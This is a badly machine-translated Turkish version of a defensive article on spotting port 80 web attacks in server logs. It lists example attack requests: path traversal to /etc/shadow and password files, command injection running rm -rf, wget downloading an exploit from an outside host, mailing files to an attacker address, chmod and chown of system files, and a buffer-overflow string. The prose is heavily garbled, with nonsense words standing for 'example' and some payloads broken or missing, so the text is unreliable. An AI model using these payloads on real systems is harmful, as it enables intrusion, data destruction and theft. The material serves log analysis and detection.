I. Özeti
II. Ayrıntılı bir açıklama
III. Daha
IV. Yayılma Analizi
V. Dönüştürme
VI. Sonuç
[Özet]
güvenlik sorunları çeşitli onun sürümünü varsayılan hizmet noktası olarak web sitesi 80, bazı güvenlik açıklarının dışarıda tutmak saldırganın da sistem yöneticisinin izni site kendisi girmek için alınmasını sağlarlar, aşağıdaki saldırıların bazı port 80 Zenomorph izleri araştırma ve nasıl log kayıtları sorunları bulmak için söyleyeceğim.
[Detail]
Burada kısmen web sunucularında ve genel saldırı uygulamaları Liezi ekranın bir numara ile ve onun izlerini, yalnızca Liezi büyük saldırı temsil, orada saldırı tüm form hiçbir listesi, bu bölüm olacak Her saldırı rolünün ayrıntılı açıklaması ve onun nasıl bu açıklardan saldırı yararlanmak için.
(1) "." ".." Ve "..." isteği
Bu saldırıların izleri çok saldırgan veya solucan-virüs programı web sunucusu yolunu değiştirmek için, kapalı alanlarda erişmek için izin vermek için kullanılan web uygulamaları ve web sunucusu için ortaktır. bu zayıf noktalardan Çoğu CGI programları, ".." isteği.
Örnek:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
Bu saldırgan Liezi isteği bu dosyayı mosd, saldırgan yeteneği atılım web sunucunuzun kök dizini, sonra ve daha fazla bilgi almak eğer daha fazla ayrıcalık elde etmek gösterir.
(2) "% 20" isteği
% 20 hex değeri, bu size bir şey kullanabilirsiniz, ama ne zaman bunu göreceksiniz günlüğünü görmek anlamına gelmez rağmen 16 boşluk, bazı web sunucusu uygulaması bu karakteri etkin uygulanabilir çalışıyor Bu nedenle, dikkatle günlük gözden geçirmelidir. Diğer taraftan, istek bazen bazı komutları gerçekleştirmek için yardımcı olabilir.
Örnek:
http://host/cgi-bin/lame.cgi?page=ls% 20-al |
Bu Liezi, istenilen belgelerin tamamını katalog listeleyen bir unix komutu çalıştırmak, sistem üzerinde önemli dosyalara erişmek için saldırganın neden daha fazla ayrıcalık elde etmek için gerekli koşulları sağlamak için ona yardımcı olmak için saldırgan gösterir.
(3) "% 00" isteği
% 00 16 baytlık hexadecimal boş dedi, o web uygulaması aptal, güçlü ve dosyaları farklı istek.
Örnekler:
http://host/cgi-bin/lame.cgi?page=index.html
Bu, bu makine üzerinde geçerli bir istek, saldırgan eylem başarılı bu talebin farkında eğer, o bulacaksınız olabilir başka sorunlara cgi programı.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Bu isteği gibi dosya adı soneki,: dosyaların html.shtml ya da diğer tip kontrol etmektir çünkü belki cgi programı bu isteği kabul etmez. Bu sefer, bu nedenle saldırganın, dosya adı, neden sistem yolunda alabilirsiniz saldırganın istekleri dosya bir dosya türü eki bir karakter olmalı anlatacağım çoğu programları istenen dosya türünü anlatacağım geçersiz sistemi daha duyarlı bilgi
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
bu talebe Dikkat, bu bu belge kabul edilebilir dosya türlerini belirlemek amacıyla cgi program dolandırıcı olacak, sık saldırgan yöntemleri kullanılır aptal istek dosyası olarak etkin denetimler bazı uygulamaları.
(4) "|" talebi
Bu boru karakteri unix sistem, aynı anda birçok sistem komutları uygulanmasında yardım talebinde bulunuyor.
Örnek:
# Cat | grep-i access_log ".."
(Bu komut ".." isteği, sık saldırılar ve solucanlara karşı kullanılan giriş gösterecektir) bulundu
Çoğu zaman bir çok web uygulamaları bu karakteri kullanın bulmak, bu da IDS de yanlış alarmları yol açar kaydeder.
Başvurunuzun dikkatli muayenesi, bu yüzden saldırı tespit sistemleri yanlış alarm azaltma avantajı da.
İşte bazı Lieh-Tzu şunlardır:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Bu istek komut, aşağıdaki Liezi bazı değişiklikler
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-al% 20/etc |
Bu istek unix sistem tüm dosyaların / etc dizininde listelenen
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep% 20-i% 20 "lame"
Kedi komut çalıştırma isteği ve grep komutunun uygulanması da, "" topal kontrol edecek
(5) "," istek
unix sistemlerde, bu karakter çok komut satırından çalıştırılmasına izin verir
Örnek:
# Id; uname-a
(Uygulama id komutu, uname komutu uygulanmasını takip)
Eğer IDS uyarılar başarısızlık riskini azaltmak böylece bu karakteri ile Bazı web program, sizin IDS neden olabilir başarısızlık bir uyarı günlükleri, dikkatli, web program kontrol etmelisiniz.
(6) " " ve " " İstek
Meli senin rekor iki karakter, bir takım nedenlerden günlükleri kontrol, ilk karakter olduğu belgede ekledi veri
Örnek 1:
Echo "senin h0 h0 hax0red #" / etc / (motd istek bu belgede yazılı bilgiler motd)
Bir saldırganın kolayca web sayfası ile kurcalamak Yukarıdaki isteği kullanabilirsiniz. ünlü RDS saldırganın istismar Mesela çoğu web sayfasını değiştirmek için kullanılır.
Örnek 2:
http://host/something.php=Hi% 20mom% 20Im% 20Bold!
Html bu işaretlerin dilini burada, o da sisteme erişmek için saldırganın neden olmaz " "," " karakterler, bu tür saldırıların geçirdi göreceksiniz, bu yasal bir bilgi web sitesi (kurşun olduğunu düşünüyorum insanlar karışık İnsanlar adresi ayarlamak için saldırganın ziyaret için bu bağlantıyı ziyaret edin, bu talebi 16 hex karakter haline formu, böylece saldırının izleri çok açık değildir) kodlanmış olabilir
(7) "!" İstek
Bu karakter istek SS (Server Side Include) saldırganın saldırgan kullanıcıya karıştırmayın link set tıkladığında eğer ben, ve yukarıda aynı saldırı Ortak dil.
Örnek:
http://host1/something.php =
Lieh-tzu saldırganın site host2 bir dosyaya bilgisayarlar1 onu yapmak isteyebilir yukarıdaki (tabii görünür, ziyaretçiler saldırganın bağlantı ayarlarını ziyaret gerektirir. Bu istek dönüştürülmüş olabilir 16 hex kodlama maske, kolay bulunamadı)
Aynı zamanda, bu yaklaşım da komuta yetkisi web sitesini çalıştırabilirsiniz
Örnek:
http://host/something.php =
Lieh-uzak sistemde "id" komutu çalıştırdığınızda,, web sitesi, kullanıcının kimliği görüntüler genelde "hiç kimse" ya da "www"
Bu form da gizli dosyaları dahil sağlar.
Örnek:
http://host/something.php =
Gizli dosyaları. Htpasswd gösterilmeyecektir, Apache. Ht için istek formu bu tür kurallara kurmak ve SSI logo bu tür kısıtlamaları bypass edecek, reddetme ve güvenlik sorunlarına yol
(8) "," İstek
Bu tür saldırıların uzaktan eklemek PHP web uygulaması işlemleri girişimi için kullanılan, bu komutları çalıştırmak için, sunucu ayarlarına bağlı olarak, ve faktörlerin (örneğin php Güvenli Mod olarak ayarlanmış bir dizi başka işler) izin verebilir
Örnek: http://host/something.php = passthru ("id ");?
Bazı basit php uygulama, o uzak sistem kullanıcı hakları yerel komutu gerçekleştirmek için web sitesine olabilir
(9) "` "talebi
Bu karakter daha sonra perl komutları çalıştırmak için kullanılan web uygulamasında karakterler genellikle kullanılmaz, bu yüzden size günlüğünde onu görürseniz, çok dikkatli olmalıdır
Örnek:
http://host/something.cgi = `id`
Bana soru bir perl cgi programı id komutu uygulanmasına yol açacak
[Daha]
Aşağıdaki bölümde komutu yerine getirebilir birlikte belgeler talep, ve saldırganın daha tartışacağız uzaktaki bir komut çalıştırma kusur varsa, nasıl muayene bunu ortaya koymuştur. Bu bölümde sadece iyi bir fikir vermek için, sisteminizde neler olduğunu söylemek, saldırganların sistem izleri saldırı çalışıyorum, ama tüm saldırganın komutları ve istekleri kullanmak liste değildir.
"/ Bin / ls"
Birçok yerde böyle bir talep oturum açmaya çalıştığınızda birçok web uygulamalarında Bu komut istekleri tüm yolu, bu boşluğu var, mümkün büyük uzaktan yürütme komut güvenlik açığı için değil, mutlaka bir sorun ayrıca yanlış alarm olabilir. Bir kez daha, web uygulaması yazılı (cgi, asp, php ...) vb hatırlattı güvenlik temelidir
Örnek:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al |
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
Bu kabuk bir pencere, bir saldırganın erişim eğer şartlar windows makineye bir şey, kurt bir sürü yapabilirsiniz izin altında sunucu ayarlarını bu komut dosyasını çalıştırın port 80 üzerinden uzak makineye iletişim
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
Eğer böyle bir istek birçok yerde log Bu iki ikili dosyaları, bu problem ve / bin / ls gibi,, ve büyük bir olasılık Yuan Cheng komutları zayıflıkları idam var, ama mutlaka bir sorun ayrıca yanlış alarm olabilir.
Hangi bölümüne ait gösterecek hangi kullanıcı ve grup
Örnek:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
Bu komut doğru kullanımı olmadan dosyaları silebilirsiniz çok tehlikelidir
Örnekler:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-rf% * | 20
http://host/cgi-bin/bad.cgi?doh=rm% 20-rf% 20 *;
"Wget ve tftp" komutu
Bu komutlar genellikle saldırgan daha fazla ayrıcalık dosyaları indirmek için kazanç olabilir, wget altında bir unix komutu, backdoors indirmek için kullanılır olabilir, tftp komutu Unix ve NT altında, dosya indirmek için kullanılır. Bazı IIS solucanlar tftp diğer ana bilgisayarlara virüs kopyalamak için kendilerini yaymak
Örnekler:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// host / cgi-bin / bad.cgi? dert = wget% 20http: / / www.hwa-security.net/Phantasmp.c;
"Kedi" komutu
Bu komut dosyasının içeriği, yapılandırma dosyaları, şifre dosyaları, kredi dosyaları ve belgeler gibi aklınıza gelebilecek önemli bilgileri okumak için kullanılan görüntülemek için kullanılır
Örnekler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% | http://host/cgi-bin/ 20/etc/motd bad.cgi? dert = cat% 20/etc/motd;
"Echo" komutu
Bu komut dosyası, böyle "index.html olarak veri yazmak için kullanılan
Örnekler: 20 "fc-# kivi% 20was% 20here"% 20 % http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo % 200day.txt | 20 "fc-# kivi% 20was% 20here"% 20 % 200day.txt% http://host/cgi-bin/bad.cgi?doh=echo;
"Ps" komutu
Listeler Çalışan süreci, daha izinleri almak için saldırgan bir uzak ana düzen güvenlik konuları hakkında bir fikir almak için yazılım çalıştıran söylemek
Örnekler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. cgi? dert = ps% 20-aux;
"Kill ve killall" komutunu
Unix sistemleri için, saldırganın sistem hizmetleri ve süreçleri durdurmak için de saldırganın izlerini silmek, bazı çocuk süreçlerin çok üretecek istismar bu komutu kullanabilirsiniz bu süreci öldürmek için
Örnekler: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill% 20 -9% 200;
"Uname" komutu
Bu komut, bir süre için, bu web sitesi üzerinden sipariş bilmek için saldırganın uzak makine adını söyler hangi isp, bugün ziyaret edilebilir saldırgan. Uname-a normal olarak, bu günlük dosyasına kaydedilecek isteyecek
Örnekler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-a | http://host/cgi-bin/bad. cgi? dert = uname% 20-a;
komutu "Kime, gcc, python, vb ..." derleme / yorumu
Saldırgan wget veya tftp aracılığıyla yararlanma, download ve yürütülebilir bir programa bu derlemek için cc, gcc derleyici kullanımı ve daha fazla erişim yetkileri
Örnekler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? dert = gcc% 20Phantasmp.c;. / a.out% 20-p% 2031337;
Eğer uzaktaki bir saldırganın python script indirmek için olabilir "perl" python "Bu talimatlar bulunmuştur günlükleri, görüş varsa ve ayrıcalıklar elde etmek için çalıştı yerel
"Posta" komutu
Saldırganlar genellikle bu komut sistemi kullanmak, saldırganın kendi posta kutusuna bazı önemli belgeler değil, aynı zamanda e-posta istekli bombalı saldırılar yapılmaktadır
Örnekler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20 % 20attacker@fuckcnhonker.org
2.168.22.1;
"Chown, chgrp, chsh, chmod vs ..." ve diğer komutlar
Bu komutlar sistem unix dosya izinlerini değiştirebilirsiniz
chown = chmod = dosya izinlerini chgrp = ayarlamanıza olanak tanır, dosya sahibinin ayarı sağlar chsh = kullanıcının kabuğunu değiştirmek için izin dosyalar üzerinde grup izinlerini değiştirebilirsiniz sahibi verir
Örnekler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi? dert = chmod% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd | http://host/cgi-bin/bad.cgi?doh=chsh% 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc /" dosya passwd
Bu sistemin şifre dosyası, genellikle kapalı gölge ve şifreli parola görmesine izin vermez, ama geçerli bir kullanıcı olduğunu biliyorsunuz, bir saldırganın, ve sistemin mutlak yolu, site adı ve diğer bilgiler, genellikle olduğu gibi Saldırgan normal göreceksiniz gölge kapalı, bu yüzden / etc / shadow dosyası
"/ Etc /" master.passwd
Bu dosya BSD sistem parolası dosyasıdır şifreli parola içeren, root hesabına dosya sadece salt okunur ve bazı vasıfsız saldırganların yaptığı girişimi içinde içeriğini okumak için açıldı., Web sitesi ise root çalıştırmak için, o zaman saldırgan, biz içinde, birbiri ardına gelecek sistem yöneticisi üzerinde bir çok problemle içeriğini okuyabilir
"/ Etc / shadow"
Içeren bir şifre şifreli sistem, root, ve aynı okuma / et / neredeyse master.passwd
"/ Etc /" motd
Kullanıcılar unix sisteme giriş, bilgi Günü "ve" Message dosyasında görünür, önemli sistem bilgileri ve bazı dizi ve kullanıcıların yönetici sağlar edenler kullanıcıları görmek istiyor, kim değil, Ayrıca sistemi sürümü bilgileri içeren, saldırgan genelde ne sistem saldırganın çalışan anlamak için bu dosyayı görmek, bir sonraki adım sisteminin bu tür istismar aramak için, ve sisteme daha fazla erişim yetkileri olduğunu
"/ Etc / hosts"
Belge sistemin ağ ayarları hakkında daha fazla bilgi edinebilirsiniz ip adresi ve ağ bilgi, saldırgan sağlar
"/ Usr / conf / httpd.conf / apache" yerel
Bu bir Apache web sunucusu yapılandırma dosyası, saldırgan, cgi, ssi ve diğer bilgiler gibi anlayabilirim erişilebilir
"/ Etc / inetd.conf"
Bu yapılandırma uzak makine öğrenebilirsiniz inetd hizmet, bir saldırganın dosya, ister erişimi kontrol etmek, eğer wrapper, saldırgan bir sonraki adım "/ etc / hosts.allow kontrol edecek koşma" bulundu ve wrapper kullanmak için bu hizmetleri başlatmak "/ etc / hosts.deny", dosya ve bazı ayarları, erişim yetkileri değişebilir
". Htpasswd. Htaccess ve. Htgroup"
Bu dosyalar genellikle web sitesinin kullanıcı doğrulama, saldırganın, bu dosyaları görüntülemek istiyorsunuz ve bir kullanıcı adı ve şifre elde kullanılır, şifre dosyası. Htpasswd, bazı basit şifre çözme sürecinde break şifreli, saldırganın sitesine erişmek için izin korunan alanlar (genellikle aynı kullanıcı adı ve şifre ile kullanıcı, saldırgan bile) diğer hesap ziyaret edebilirsiniz
"Access_log ve error_log"
Bu apache sunucu kayıt dosyaları, saldırganların çoğu bu resimler, bu talepleri, bakmak, kaydedilir görmek o ve farklı yerlerde diğer istekler
Tipik olarak, saldırganın kendi adres bilgileri gibi bu log dosyaları, değişiklik olacak, sistem üzerinden port 80 üzerinden saldırgan ve yedek sistemi de işe yaramazsa, başka hiçbir kayıt programı kayıt sistemi durumu, hangi-cekti saldırı tespit çok çalışmak zorlaşır
"[Drive-harfi]: winntrepairsam._ veya [Sürücü harfi]: winntrepairsam"
Saldırgan eğer yönetici şifre dosyası, saldırı çalışırsa Windows NT sistem şifre dosyası, uzaktan komut uygulamaya olamaz, saldırganlar genellikle, daha sonra "crack, şifre tipinin l0pht crack" kırma araçları bu belgeleri talep edecek sonra uzak makine saldırganın olacak başarılı kontrol gets
[Taşma analizi]
Ben çok fazla konu taşması hakkında demeyeceğim Bu makalede, dışarı vereceğim ne bu olayları ve kayda değer ve özellikle endişe, bir tampon genellikle saldırganın kod dönüşüm ve güç tarafından başka yollarla elde bulmak için saldırıya izleri
Burada basit bir Lie Zi olduğunu
Örnek: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
sahibi setuid ve kök için prosedürleri vardır, bu Liezi bir uygulama, bir buffer overflow programı test etmek için bir karakter bir çok göndermek için saldırganın gösterileri, buffer overflow, taşma aracılığıyla uzaktan komut çalıştırma host izinleri almak , setuid program değilse gibi tüm sistemin erişim elde edebilirsiniz, daha sonra taşma sadece web sitesinin kullanıcı hakları çalışan tarafından
Burada ve ilgili tüm koşullar konuşmak değil, ama zaman bir gün birdenbire, açılış zamanlarında Buduo orada kişi bir sürü bulundu log dosyalarını kontrol etmek gerekirdi, sen, elbette acı taşması atakları Zheng konum da olabilir Yeni bir ağ solucan saldırısı
[] Dönüştürme
Tüm saldırılar isteği yukarıda belirtilen saldırgan genelde çoğu mekanik kontrol talebi, genellikle saldırgan dönüştürme aracı, IDS bu isteklerini gözardı edecek sonucu istenen içerik format 16 bant dönüştürmek için verileri kullanacağız, IDS sistemleri bilir Biz CGI açığı iyi Liezi Whisker bir araç tarama sahibisiniz. Eğer zaman günlüğüne bakarsanız bazı yollar senin sistem saldırı için kullanmaya çalıştığınızda 16 Mayıs-band değil, bazı ortak karakterleri, daha sonra saldırgan çok sayıda bulundu
Hızlı bir şekilde giriş o 16 hex için istek dosyasını tarayıcınıza kopyalayın, tarayıcınızın sağ isteği içine dönüştürülebilir ve talebin içeriğini görünmüyorsa, eğer yapmazsam cesaret, doğru kodu verebilir Bu risk, basit bir adam ASCII almak.
[Sonuç]
Bu makalede, ancak saldırının tüm 80 liman kapsayamaz en fazla genel saldırı daha atıf yapıldı ve nasıl log dosyalarını kontrol etmek için size ve böyle IDS kuralların sayısı, onun objektif yazmak gibi olduğunu eklemek web sistem yöneticisi, Ben bu yazıda daha iyi programlar yazmak için program web geliştiricileri web yardımcı umut ne iyi bir fikir aynı zamanda endişe olmalı
E-posta admin@cgisecurity.com gönderin NOT OF: Herhangi bir yorum ve öneriler varsa,.